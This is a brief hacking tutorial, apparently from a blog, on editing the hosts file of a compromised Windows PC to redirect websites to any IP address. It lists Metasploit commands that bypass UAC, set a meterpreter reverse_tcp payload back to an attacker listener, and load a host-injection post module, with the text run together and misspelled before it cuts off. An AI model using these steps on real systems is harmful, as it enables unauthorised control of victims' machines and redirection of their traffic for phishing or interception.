Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.(1)Hack remote p.c .(How to hack Remote P.C.?)(2)Now we will Bypass U.A.C. protection of windows.(3)Open Terminal & type following code in terminalmsfconsoleuse exploit/windows/local/bypassuacset payload windows/meterpreter/reverse_tcpset lhost 192.168.1.6set session 1exploit(4)Now we will edit host file.msf >use post/windows/manage/injet_hostmsf post(injet_host)...